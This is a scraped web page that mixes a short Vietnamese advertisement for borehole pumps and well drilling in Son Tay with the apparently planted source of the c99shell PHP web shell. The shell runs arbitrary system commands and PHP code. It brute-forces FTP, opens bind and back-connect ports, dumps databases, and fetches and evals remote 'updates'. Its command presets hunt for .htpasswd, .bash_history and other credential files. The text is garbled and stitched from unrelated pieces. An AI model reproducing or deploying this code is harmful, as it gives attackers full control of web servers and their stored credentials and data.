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Khoan Giếng thị xã Sơn Tây Hà Nội

/____/ /____/ /_______ /|___| /\___ >____/____/ \_/ / \_______ / \_____ / / / / / / / / / _ _____ _ __ ___ _ __ ______ | | | __ (_) / / | | /_ |___ / | |__ _ _ | |__) | _ __ ___ _ / / /| |__| || | / / | '_ | | | | | ___/ | '_ / _ | | | / / / | __ || | / / | |_) | |_| | | | | | | | | (_) | |_| | / / | | | || |/ /__ |_.__/ \__, | |_| |_|_| |_|\___/ \__, | / / |_| |_||_/_____| __/ | __/ | |___/ |___/ * c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7 * **************************************************************************************************** */ if (!function_exists("getmicrotime")) { function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } } error_reporting(5); @ignore_user_abort(true); $win = strtolower(substr(PHP_OS, 0, 3)) == "win"; define("starttime", getmicrotime()); if (get_magic_quotes_gpc()) { if (!function_exists("strips")) { function strips(&$arr, $k = "") { if (is_array($arr)) { foreach ($arr as $k => $v) { if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); } } } else { $arr = stripslashes($arr); } } } strips($GLOBALS); } $_REQUEST = array_merge($_COOKIE, $_GET, $_POST); foreach ($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } } $shver = "2.0 [PHP 7 Update] [25.02.2019]"; if (!empty($unset_surl)) { setcookie("c99sh_surl"); $surl = ""; } elseif (!empty($set_surl)) { $surl = $set_surl; setcookie("c99sh_surl", $surl); } else { $surl = $_REQUEST["c99sh_surl"]; } $surl_autofill_include = true; if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) { $include = "&"; foreach (explode("&", getenv("QUERY_STRING")) as $v) { $v = explode("=", $v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array( "http://", "https://", "ssl://", "ftp://", "\\" ) as $needle) { if (strpos($value, $needle) === 0) { $includestr .= urlencode($name) . "=" . urlencode($value) . "&"; } } } if ($_REQUEST["surl_autofill_include"]) { $includestr .= "surl_autofill_include=1&"; } } if (empty($surl)) { $surl = "?" . $includestr; } $surl = htmlspecialchars($surl); $timelimit = 0; $login = ""; $pass = ""; $md5_pass = ""; $host_allow = array( "*" ); $login_txt = "Restricted area"; $accessdeniedmess = "c99shell v." . $shver . ": access denied"; $gzipencode = true; $updatenow = false; $c99sh_updateurl = ""; $c99sh_sourcesurl = ""; $filestealth = true; $donated_html = "
Owned by hacker
"; $donated_act = array( "" ); $curdir = "./"; $tmpdir = ""; $tmpdir_log = "./"; $log_email = "user@host.tld"; $sort_default = "0a"; $sort_save = true; $ftypes = array( "html" => array( "html", "htm", "shtml" ) , "txt" => array( "txt", "conf", "bat", "sh", "js", "bak", "doc", "log", "sfc", "cfg", "htaccess" ) , "exe" => array( "sh", "install", "bat", "cmd" ) , "ini" => array( "ini", "inf" ) , "code" => array( "php", "phtml", "php3", "php4", "inc", "tcl", "h", "c", "cpp", "py", "cgi", "pl" ) , "img" => array( "gif", "png", "jpeg", "jfif", "jpg", "jpe", "bmp", "ico", "tif", "tiff", "avi", "mpg", "mpeg" ) , "sdb" => array( "sdb" ) , "phpsess" => array( "sess" ) , "download" => array( "exe", "com", "pif", "src", "lnk", "zip", "rar", "gz", "tar" ) ); $exeftypes = array( getenv("PHPRC") . " -q %f%" => array( "php", "php3", "php4" ) , "perl %f%" => array( "pl", "cgi" ) ); $regxp_highlight = array( array( basename($_SERVER["PHP_SELF"]) , 1, "", "" ) , array( "config.php", 1 ) ); $safemode_diskettes = array( "a" ); $hexdump_lines = 8; $hexdump_rows = 24; $nixpwdperpage = 100; $bindport_pass = "c99"; $bindport_port = "31373"; $bc_port = "31373"; $datapipe_localport = "8081"; if (!$win) { $cmdaliases = array( array( "-----------------------------------------------------------", "ls -la" ) , array( "find all suid files", "find / -type f -perm -04000 -ls" ) , array( "find suid files in current dir", "find . -type f -perm -04000 -ls" ) , array( "find all sgid files", "find / -type f -perm -02000 -ls" ) , array( "find sgid files in current dir", "find . -type f -perm -02000 -ls" ) , array( "find files", "find / -type f -name" ) , array( "find config* files", "find / -type f -name "config*"" ) , array( "find config* files in current dir", "find . -type f -name "config*"" ) , array( "find all writable folders and files", "find / -perm -2 -ls" ) , array( "find all writable folders and files in current dir", "find . -perm -2 -ls" ) , array( "find all service.pwd files", "find / -type f -name service.pwd" ) , array( "find service.pwd files in current dir", "find . -type f -name service.pwd" ) , array( "find all .htpasswd files", "find / -type f -name .htpasswd" ) , array( "find .htpasswd files in current dir", "find . -type f -name .htpasswd" ) , array( "find all .bash_history files", "find / -type f -name .bash_history" ) , array( "find .bash_history files in current dir", "find . -type f -name .bash_history" ) , array( "find all .fetchmailrc files", "find / -type f -name .fetchmailrc" ) , array( "find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc" ) , array( "list file attributes on a Linux second extended file system", "lsattr -va" ) , array( "show opened ports", "netstat -an | grep -i listen" ) ); } else { $cmdaliases = array( array( "-----------------------------------------------------------", "dir" ) , array( "show opened ports", "netstat -an" ) ); } $sess_cookie = "c99shvars"; $usefsbuff = true; $copy_unset = false; $quicklaunch = array( array( "Home", $surl ) , array( "Back", "#" onclick="history.back(1)" ) , array( "Forward", "#" onclick="history.go(1)" ) , array( "UPDIR", $surl . "act=ls&d=%upd&sort=%sort" ) , array( "Refresh", "" ) , array( "Search", $surl . "act=search&d=%d" ) , array( "Buffer", $surl . "act=fsbuff&d=%d" ) , array( "Encoder", $surl . "act=encoder&d=%d" ) , array( "Tools", $surl . "act=tools&d=%d" ) , array( "Proc.", $surl . "act=processes&d=%d" ) , array( "FTP brute", $surl . "act=ftpquickbrute&d=%d" ) , array( "Sec.", $surl . "act=security&d=%d" ) , array( "SQL", $surl . "act=sql&d=%d" ) , array( "PHP-code", $surl . "act=eval&d=%d" ) , array( "Update", $surl . "act=update&d=%d" ) , array( "Feedback", $surl . "act=feedback&d=%d" ) , array( "Self remove", $surl . "act=selfremove" ) , array( "Logout", "#" onclick="if (confirm('Are you sure?')) window.close()" ) ); $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["c99shcook"]); @set_time_limit(0); $tmp = array(); foreach ($host_allow as $k => $v) { $tmp[] = str_replace("\*", ".*", preg_quote($v)); } $s = "!^(" . implode("|", $tmp) . ")$!i"; if (!preg_match($s, getenv("REMOTE_ADDR")) and !preg_match($s, gethostbyaddr(getenv("REMOTE_ADDR")))) { exit("c99shell: Access Denied - your host (" . getenv("REMOTE_ADDR") . ") not allow"); } if (!empty($login)) { if (empty($md5_pass)) { $md5_pass = md5($pass); } if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) { $login_txt = strip_tags(preg_replace(" |
", " ", $donated_html)); } header("WWW-Authenticate: Basic realm="c99shell " . $shver . ": " . $login_txt . """); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) { @ob_clean(); c99sh_getupdate($selfwrite, 1); exit; } $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) { $sess_data = array(); } if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); } if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); } $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ", "", $disablefunc); $disablefunc = explode(",", $disablefunc); } if (!function_exists("c99_buff_prepare")) { function c99_buff_prepare() { global $sess_data; global $act; foreach ($sess_data["copy"] as $k => $v) { $sess_data["copy"][$k] = str_replace("\", DIRECTORY_SEPARATOR, realpath($v)); } foreach ($sess_data["cut"] as $k => $v) { $sess_data["cut"][$k] = str_replace("\", DIRECTORY_SEPARATOR, realpath($v)); } $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") { foreach ($sess_data["cut"] as $k => $v) { if ($sess_data["copy"][$k] == $v) { unset($sess_data["copy"][$k]); } } } else { foreach ($sess_data["copy"] as $k => $v) { if ($sess_data["cut"][$k] == $v) { unset($sess_data["cut"][$k]); } } } } } c99_buff_prepare(); if (!function_exists("c99_sess_put")) { function c99_sess_put($data) { global $sess_cookie; global $sess_data; c99_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie, $data); } } foreach (array( "sort", "sql_sort" ) as $v) { if (!empty($_GET[$v])) { $$v = $_GET[$v]; } if (!empty($_POST[$v])) { $$v = $_POST[$v]; } } if ($sort_save) { if (!empty($sort)) { setcookie("sort", $sort); } if (!empty($sql_sort)) { setcookie("sql_sort", $sql_sort); } } if (!function_exists("str2mini")) { function str2mini($content, $len) { if (strlen($content) > $len) { $len = ceil($len / 2) - 2; return substr($content, 0, $len) . "..." . substr($content, -$len); } else { return $content; } } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) { return false; } else { if ($size >= 1073741824) { $size = round($size / 1073741824 * 100) / 100 . " GB"; } elseif ($size >= 1048576) { $size = round($size / 1048576 * 100) / 100 . " MB"; } elseif ($size >= 1024) { $size = round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { $ret = mkdir($t . DIRECTORY_SEPARATOR . $o); fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\", DIRECTORY_SEPARATOR, $t); if (!is_dir(dirname($t))) { mkdir(dirname($t)); } if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_copy_dir($d, $t); } elseif (is_file($d)) { return copy($d, $t); } else { return false; } } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d, $t) { $h = opendir($d); if (!is_dir($t)) { mkdir($t); } while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { $ret = true; if (!is_dir($d . DIRECTORY_SEPARATOR . $o)) { $ret = copy($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o); } else { if (mkdir($t . DIRECTORY_SEPARATOR . $o) and fs_copy_dir($d . DIRECTORY_SEPARATOR . $o, $t . DIRECTORY_SEPARATOR . $o)) { $ret = false; } } if (!$ret) { return $ret; } } } closedir($h); return true; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d, $t) { $d = str_replace("\", DIRECTORY_SEPARATOR, $d); $t = str_replace("\", DIRECTORY_SEPARATOR, $t); if (is_dir($d)) { if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } if (substr($t, -1) != DIRECTORY_SEPARATOR) { $t .= DIRECTORY_SEPARATOR; } return fs_move_dir($d, $t); } elseif (is_file($d)) { if (copy($d, $t)) { return unlink($d); } else { unlink($t); return false; } } else { return false; } } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== false) { if (($o != ".") and ($o != "..")) { if (!is_dir($d . $o)) { unlink($d . $o); } else { fs_rmdir($d . $o . DIRECTORY_SEPARATOR); rmdir($d . $o); } } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\", DIRECTORY_SEPARATOR, $o); if (is_dir($o)) { if (substr($o, -1) != DIRECTORY_SEPARATOR) { $o .= DIRECTORY_SEPARATOR; } return fs_rmdir($o); } elseif (is_file($o)) { return unlink($o); } else { return false; } } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec", $disablefunc)) { exec($cmd, $result); $result = join(" ", $result); } elseif (($result = `$cmd`) !== false) { } elseif (is_callable("system") and !in_array("system", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_callable("passthru") and !in_array("passthru", $disablefunc)) { $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v; } elseif (is_resource($fp = popen($cmd, "r"))) { $result = ""; while (!feof($fp)) { $result .= fread($fp, 1024); } pclose($fp); } } return $result; } } if (!function_exists("tabsort")) { function tabsort($a, $b) { global $v; return strnatcmp($a[$v], $b[$v]); } } if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) { $type = "s"; } elseif (($mode & 0x4000) === 0x4000) { $type = "d"; } elseif (($mode & 0xA000) === 0xA000) { $type = "l"; } elseif (($mode & 0x8000) === 0x8000) { $type = "-"; } elseif (($mode & 0x6000) === 0x6000) { $type = "b"; } elseif (($mode & 0x2000) === 0x2000) { $type = "c"; } elseif (($mode & 0x1000) === 0x1000) { $type = "p"; } else { $type = "?"; } $owner["read"] = ($mode & 00400) ? "r" : "-"; $owner["write"] = ($mode & 00200) ? "w" : "-"; $owner["execute"] = ($mode & 00100) ? "x" : "-"; $group["read"] = ($mode & 00040) ? "r" : "-"; $group["write"] = ($mode & 00020) ? "w" : "-"; $group["execute"] = ($mode & 00010) ? "x" : "-"; $world["read"] = ($mode & 00004) ? "r" : "-"; $world["write"] = ($mode & 00002) ? "w" : "-"; $world["execute"] = ($mode & 00001) ? "x" : "-"; if ($mode & 0x800) { $owner["execute"] = ($owner["execute"] == "x") ? "s" : "S"; } if ($mode & 0x400) { $group["execute"] = ($group["execute"] == "x") ? "s" : "S"; } if ($mode & 0x200) { $world["execute"] = ($world["execute"] == "x") ? "t" : "T"; } return $type . join("", $owner) . join("", $group) . join("", $world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid", $disablefunc)) { function posix_getpwuid($uid) { return false; } } if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid", $disablefunc)) { function posix_getgrgid($gid) { return false; } } if (!function_exists("posix_kill") and !in_array("posix_kill", $disablefunc)) { function posix_kill($gid) { return false; } } if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) { $t = "s"; } elseif (($mode & 0x4000) === 0x4000) { $t = "d"; } elseif (($mode & 0xA000) === 0xA000) { $t = "l"; } elseif (($mode & 0x8000) === 0x8000) { $t = "-"; } elseif (($mode & 0x6000) === 0x6000) { $t = "b"; } elseif (($mode & 0x2000) === 0x2000) { $t = "c"; } elseif (($mode & 0x1000) === 0x1000) { $t = "p"; } else { $t = "?"; } $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array( "t" => $t, "o" => $o, "g" => $g, "w" => $w ); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort, -1); if ($second != "d") { $second = "a"; } return array( $one, $second ); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) { return "" . view_perms(fileperms($o)) . ""; } elseif (!is_writable($o)) { return "" . view_perms(fileperms($o)) . ""; } else { return "" . view_perms(fileperms($o)) . ""; } } } if (!function_exists("c99getsource")) { function c99getsource($fn) { global $c99sh_sourcesurl; $array = array( "" => "c99sh_bindport_pl.txt", "c99sh_bindport.c" => "c99sh_bindport_c.txt", "" => "c99sh_backconn_pl.txt", "c99sh_backconn.c" => "c99sh_backconn_c.txt", "" => "c99sh_datapipe_pl.txt", "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) { return file_get_contents($c99sh_sourcesurl . $name); } else { return false; } } } if (!function_exists("c99sh_getupdate")) { function c99sh_getupdate($update = true) { $url = $GLOBALS["c99sh_updateurl"] . "?version=" . urlencode(base64_encode($GLOBALS["shver"])) . "&updatenow=" . ($updatenow ? "1" : "0") . "&"; $data = @file_get_contents($url); if (!$data) { return "Can't connect to update-server!"; } else { $data = ltrim($data); $string = substr($data, 3, ord($data{2})); if ($data{0} == "x99" and $data{1} == "x01") { return "Error: " . $string; return false; } if ($data{0} == "x99" and $data{1} == "x02") { return "You are using latest version!"; } if ($data{0} == "x99" and $data{1} == "x03") { $string = explode("x01", $string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) { return "Can't fetch update!"; } else { $fp = fopen(__FILE__, "w"); if (!$fp) { return "Local error: can't write update to " . __FILE__ . "! You may download c99shell.php manually here."; } else { fwrite($fp, $source); fclose($fp); return "Thanks! Updated with success."; } } } else { return "New version are available: " . $string[1]; } } elseif ($data{0} == "x99" and $data{1} == "x04") { eval($string); return 1; } else { return "Error in protocol: segmentation failed! (" . $data . ") "; } } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) { echo ("Error: $sock is not valid resource."); } if (empty($db)) { $db = "db"; } if (empty($print)) { $print = 0; } if (empty($nl2br)) { $nl2br = 0; } if (empty($add_drop)) { $add_drop = true; } if (empty($file)) { $file = $tmpdir . "dump_" . getenv("SERVER_NAME") . "_" . $db . "_" . date("d-m-Y-H-i-s") . ".sql"; } if (!is_array($tabs)) { $tabs = array(); } if (empty($add_drop)) { $add_drop = true; } if (sizeof($tabs) == 0) { $res = mysql_query("SHOW TABLES FROM " . $db, $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_row($res)) { $tabs[] = $row[0]; } } } $out = "# Dumped by C99Shell.SQL v. " . $shver . " # Home page: # # Host settings: # MySQL version: (" . mysql_get_server_info() . ") running on " . getenv("SERVER_ADDR") . " (" . getenv("SERVER_NAME") . ")" . " # Date: " . date("d.m.Y H:i:s") . " # DB: "" . $db . "" #--------------------------------------------------------- "; $c = count($onlytabs); foreach ($tabs as $tab) { if ((in_array($tab, $onlytabs)) or (!$c)) { if ($add_drop) { $out .= "DROP TABLE IF EXISTS `" . $tab . "`; "; } $res = mysql_query("SHOW CREATE TABLE `" . $tab . "`", $sock); if (!$res) { $ret["err"][] = mysql_smarterror(); } else { $row = mysql_fetch_row($res); $out .= $row["1"] . "; "; $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach ($values as $k => $v) { $values[$k] = addslashes($v); } $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`" . $keys . "`) VALUES ('" . $values . "'); "; $out .= $sql; } } } } } $out .= "#--------------------------------------------------------------------------------- "; if ($file) { $fp = fopen($file, "w"); if (!$fp) { $ret["err"][] = 2; } else { fwrite($fp, $out); fclose($fp); } } if ($print) { if ($nl2br) { echo nl2br($out); } else { echo $out; } } return $out; } } if (!function_exists("mysql_buildwhere")) { function mysql_buildwhere($array, $sep = " and", $functs = array()) { if (!is_array($array)) { $array = array(); } $result = ""; foreach ($array as $k => $v) { $value = ""; if (!empty($functs[$k])) { $value .= $functs[$k] . "("; } $value .= "'" . addslashes($v) . "'"; if (!empty($functs[$k])) { $value .= ")"; } $result .= "`" . $k . "` = " . $value . $sep; } $result = substr($result, 0, strlen($result) - strlen($sep)); return $result; } } if (!function_exists("mysql_fetch_all")) { function mysql_fetch_all($query, $sock) { if ($sock) { $result = mysql_query($query, $sock); } else { $result = mysql_query($query); } $array = array(); while ($row = mysql_fetch_array($result)) { $array[] = $row; } mysql_free_result($result); return $array; } } if (!function_exists("mysql_smarterror")) { function mysql_smarterror($type, $sock) { if ($sock) { $error = mysql_error($sock); } else { $error = mysql_error(); } $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysql_query_form")) { function mysql_query_form() { global $submit, $sql_act, $sql_query, $sql_query_result, $sql_confirm, $sql_query_error, $tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) { if (!$sql_query_error) { $sql_query_error = "Query was empty"; } echo "Error:
" . $sql_query_error . "
"; } if ($sql_query_result or (!$sql_confirm)) { $sql_act = $sql_goto; } if ((!$submit) or ($sql_act)) { echo ""; if ($tbl_struct) { echo "
"; if (($sql_query) and (!$submit)) { echo "Do you really want to"; } else { echo "SQL-Query"; } echo ":

"; foreach ($tbl_struct as $field) { $name = $field["Field"]; echo "» " . $name . "
"; } echo "
"; } } if ($sql_query_result or (!$sql_confirm)) { $sql_query = $sql_last_query; } } } if (!function_exists("mysql_create_db")) { function mysql_create_db($db, $sock = "") { $sql = "CREATE DATABASE `" . addslashes($db) . "`;"; if ($sock) { return mysql_query($sql, $sock); } else { return mysql_query($sql); } } } if (!function_exists("mysql_query_parse")) { function mysql_query_parse($query) { $query = trim($query); $arr = explode(" ", $query); $types = array( "SELECT" => array( 3, 1 ) , "SHOW" => array( 2, 1 ) , "DELETE" => array( 1 ) , "DROP" => array( 1 ) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach ($arr as $k => $v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k + 1]; $result["limit"] = explode(",", $result["limit"]); if (count($result["limit"]) == 1) { $result["limit"] = array( 0, $result["limit"][0] ); } unset($arr[$k], $arr[$k + 1]); } } } } else { return false; } } } if (!function_exists("c99fsearch")) { function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d, -1) != DIRECTORY_SEPARATOR) { $d .= DIRECTORY_SEPARATOR; } $h = opendir($d); while (($f = readdir($h)) !== false) { if ($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f, $a["name"]) !== false) || ($a["name_regexp"] and preg_match($a["name"], $f)); if (is_dir($d . $f)) { $search_i_d++; if (empty($a["text"]) and $bool) { $found[] = $d . $f; $found_d++; } if (!is_link($d . $f)) { c99fsearch($d . $f); } } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d . $f); if ($a["text_wwo"]) { $a["text"] = " " . trim($a["text"]) . " "; } if (!$a["text_cs"]) { $a["text"] = strtolower($a["text"]); $r = strtolower($r); } if ($a["text_regexp"]) { $bool = preg_match($a["text"], $r); } else { $bool = strpos(" " . $r, $a["text"], 1); } if ($a["text_not"]) { $bool = !$bool; } if ($bool) { $found[] = $d . $f; $found_f++; } } else { $found[] = $d . $f; $found_f++; } } } } } closedir($h); } } if ($act == "gofile") { if (is_dir($f)) { $act = "ls"; $d = $f; } else { $act = "f"; $d = dirname($f); $f = basename($f); } } @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode, $ft; if (!headers_sent() and $gzipencode and !in_array($ft, array( "img", "download", "notepad" ))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } } function c99shexit() { onphpshutdown(); exit; } header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", false); header("Pragma: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) { $tmpdir = "/tmp/"; } } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\", DIRECTORY_SEPARATOR, $tmpdir); if (substr($tmpdir, -1) != DIRECTORY_SEPARATOR) { $tmpdir .= DIRECTORY_SEPARATOR; } if (empty($tmpdir_logs)) { $tmpdir_logs = $tmpdir; } else { $tmpdir_logs = realpath($tmpdir_logs); } if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = true; $hsafemode = "ON (secure)"; } else { $safemode = false; $hsafemode = "OFF (not secure)"; } $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") { $openbasedir = true; $hopenbasedir = "" . $v . ""; } else { $openbasedir = false; $hopenbasedir = "OFF (not secure)"; } $sort = htmlspecialchars($sort); if (empty($sort)) { $sort = $sort_default; } $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); if (!preg_match("PHP/" . phpversion() , $DISP_SERVER_SOFTWARE)) { $DISP_SERVER_SOFTWARE .= ". PHP/" . phpversion(); } $DISP_SERVER_SOFTWARE = str_replace("PHP/" . phpversion() , "PHP/" . phpversion() . "", htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set("", $highlight_bg); @ini_set("highlight.comment", $highlight_comment); @ini_set("highlight.default", $highlight_default); @ini_set("highlight.html", $highlight_html); @ini_set("highlight.keyword", $highlight_keyword); @ini_set("highlight.string", $highlight_string); if (!is_array($actbox)) { $actbox = array(); } $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><?php echo getenv("HTTP_HOST"); ?> - c99shell

Ngày nay nhu cầu sử dụng máy bơm hoả tiễn trong khoan giếng là rất lớn vì khi hệ thống cấp nước bằng giếng thường đã lỗi thường và không đủ đáp ứng cho các hệ thống công trình cấp nước lớn. Chính vì thế dòng máy bơm hoả tiễn giếng khoan đã ra đời giúp cho người sử dụng khai thác được nguồn nước ở độ sâu 40 - 130m. Trên thị trường có nhiều loại máy bơm giếng với kích thước và hiệu suất khác nhau nên để chọn được dòng máy bơm thích hợp thì người sử dụng cần phải tìm hiểu kỹ lưỡng đồng thời có sự tư vấn của nhà cung cấp để đảm bảo được hiệu quả cao nhất cho nhu cầu của mình

!C99Shell v. !


uname -a: ", 1); ?> 

", 1); } else { echo get_current_user(); } ?> 


" . htmlspecialchars($b) . DIRECTORY_SEPARATOR . ""; $i++; } echo "   "; if (is_writable($d)) { $wd = true; $wdt = "[ ok ]"; echo "" . view_perms(fileperms($d)) . ""; } else { $wd = false; $wdt = "[ Read-Only ]"; echo "" . view_perms_color($d) . ""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === false) { $free = 0; } if ($total === false) { $total = 0; } if ($free < 0) { $free = 0; } if ($total < 0) { $total = 0; } $used = $total - $free; $free_percent = round(100 / ($total / $free) , 2); echo "
Free " . view_size($free) . " of " . view_size($total) . " (" . $free_percent . "%)"; } echo "
"; $letters = ""; if ($win) { $v = explode("\", $d); $v = $v[0]; foreach (range("a", "z") as $letter) { $bool = $isdiskette = in_array($letter, $safemode_diskettes); if (!$bool) { $bool = is_dir($letter . ":\"); } if ($bool) { $letters .= "[ "; if ($letter . ":" != $v) { $letters .= $letter; } else { $letters .= "" . $letter . ""; } $letters .= " ] "; } } if (!empty($letters)) { echo "Detected drives: " . $letters . "
"; } } if (count($quicklaunch) > 0) { foreach ($quicklaunch as $item) { $item[1] = str_replace("%d", urlencode($d) , $item[1]); $item[1] = str_replace("%sort", $sort, $item[1]); $v = realpath($d . ".."); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR, $d); unset($a[count($a) - 2]); $v = join(DIRECTORY_SEPARATOR, $a); } $item[1] = str_replace("%upd", urlencode($v) , $item[1]); echo "" . $item[0] . "    "; } } echo "